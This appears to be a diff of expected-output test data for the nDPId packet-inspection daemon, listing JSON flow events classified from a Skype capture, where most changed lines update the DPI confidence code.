-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969687310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} @@ -1338,7 +1338,7 @@ 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969683081,"flow_last_seen":1431969710648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} 00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969708230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} @@ -1347,7 +1347,7 @@ 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969692087,"flow_last_seen":1431969710209,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":515,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969699142,"flow_last_seen":1431969728419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":684,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} @@ -1360,108 +1360,108 @@ 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969706277,"flow_last_seen":1431969723613,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":592,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 